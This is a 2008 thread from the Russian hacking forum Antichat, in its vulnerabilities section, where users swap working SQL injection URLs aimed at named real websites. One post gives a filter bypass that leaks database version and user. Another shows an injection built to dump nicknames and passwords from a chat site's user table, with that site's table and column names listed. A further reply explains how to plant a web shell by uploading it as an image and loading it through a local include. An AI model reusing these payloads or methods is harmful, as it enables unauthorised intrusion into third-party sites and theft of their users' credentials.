ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2491  
Старый 27.06.2008, 19:08
Naydav
Постоянный
Регистрация: 30.12.2006
Сообщений: 434
Провел на форуме:
849583

Репутация: 210
По умолчанию

delete

Последний раз редактировалось Naydav; 30.06.2008 в 01:41..
 
Ответить с цитированием

  #2492  
Старый 27.06.2008, 19:11
Doom123
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
Провел на форуме:
3941248

Репутация: 668


Отправить сообщение для Doom123 с помощью ICQ
По умолчанию

не пойдёт... там же нету вывода на экран результата ... там идёт так...

1 запрос с этим параметром и 2ой запрос

в первом запросе яя подобралк количество полей! но во 2ой это количество не подходит и происходит выполнение вункции die(); с ошибкой mysql
 
Ответить с цитированием

  #2493  
Старый 27.06.2008, 20:20
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от Doom123  
не пойдёт... там же нету вывода на экран результата ... там идёт так...

1 запрос с этим параметром и 2ой запрос

в первом запросе яя подобралк количество полей! но во 2ой это количество не подходит и происходит выполнение вункции die(); с ошибкой mysql
Ты представляешь, что такое подзапросы с посимвольным перебором?
Для них не нужен вывод. Это своего рода true/false.
Условие верно-страница вылезла,не верно-ошибка
Твой случай ,если я понял правильно, именно подзапросами и выводится(Да, гиммороя побольше чем с нормальным выводом, но по другому никак)
 
Ответить с цитированием

  #2494  
Старый 27.06.2008, 21:27
n3m0
Участник форума
Регистрация: 11.05.2007
Сообщений: 149
Провел на форуме:
6373157

Репутация: 247
Отправить сообщение для n3m0 с помощью ICQ
По умолчанию

Цитата:
Сообщение от Naydav  
там под сотню юзеров , каждый юзер - это походу "сайт"?
Да.
Вот, вот этот хостинг http://www.valuehost.ru/
 
Ответить с цитированием

  #2495  
Старый 29.06.2008, 17:51
Buffalon
Постоянный
Регистрация: 22.03.2008
Сообщений: 325
Провел на форуме:
1208132

Репутация: 63
По умолчанию

http://www.rgufk.ru/modules/sections/index.php?op=viewarticle&artid=148+union+select+1, 2,3,4,5,6,7,8,9,10/*
Вот что с этим можно сделать?ТАм что то фильтруется ... .
 
Ответить с цитированием

  #2496  
Старый 29.06.2008, 18:43
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Buffalon
Фильтр слабенький, вот обход:
http://www.rgufk.ru/modules/sections/index.php?op=viewarticle&artid=148+and+1=2+union+s elect+1,2,version(),4,5,user(),7,8,9,10
 
Ответить с цитированием

  #2497  
Старый 29.06.2008, 21:50
Бармалей
Новичок
Регистрация: 30.05.2008
Сообщений: 4
Провел на форуме:
6739

Репутация: 0
По умолчанию

вопрос.
есть загрузка файлов/картинок
при загрузке меняется только название и расширение файла на жпг. содержимое не меняется
как залить шелл и возможно ли?
 
Ответить с цитированием

  #2498  
Старый 29.06.2008, 22:34
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194

Репутация: 1934


Отправить сообщение для AFoST с помощью ICQ
По умолчанию

Бармалей, если у тебя будет локальный инклуд, то будет и шелл. заливаешь картинку с содержимым шелла, потом инклудишь...
 
Ответить с цитированием

  #2499  
Старый 29.06.2008, 22:57
Бармалей
Новичок
Регистрация: 30.05.2008
Сообщений: 4
Провел на форуме:
6739

Репутация: 0
По умолчанию

нету там инклуда(
 
Ответить с цитированием

  #2500  
Старый 30.06.2008, 14:49
Мистерео
Познающий
Регистрация: 07.08.2006
Сообщений: 66
Провел на форуме:
2256830

Репутация: 94
По умолчанию

Вот проблемка
Нашел Sql раскрутил и вот
Код:
http://www.oke.ru/xo4u.php?id=-42708+UNION+SELECT+1,2,concat_ws(0x3a,nick,passw),4,5,6,7,8,9,10+FROM+chausers/*
но ниче не выводит
Таблицы
Код:
COLLATIONS.
COLLATION_CHARACTER_ SET_APPLICABILITY.
COLUMNS.
COLUMN_PRIVILEGES.
ENGINES.
EVENTS.
FILES.
GLOBAL_STATUS.
GLOBAL_VARIABLES.
KEY_COLUMN_USAGE.
PARTITIONS.
PLUGINS.
PROCESSLIST.
REFERENTIAL_CONSTRAI NTS.
ROUTINES.
SCHEMATA.
SCHEMA_PRIVILEGES.
SESSION_STATUS.
SESSION_VARIABLES.
STATISTICS.
TABLES.
TABLE_CONSTRAINTS.
TABLE_PRIVILEGES.
TRIGGERS.
USER_PRIVILEGES.
VIEWS.
chamess.
chamess_old1.
charooms.
chausers.
mess.
wants.
Колонки в chausers
Код:
idate
nick
email
chalogid
lastdate
roomid
passw
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ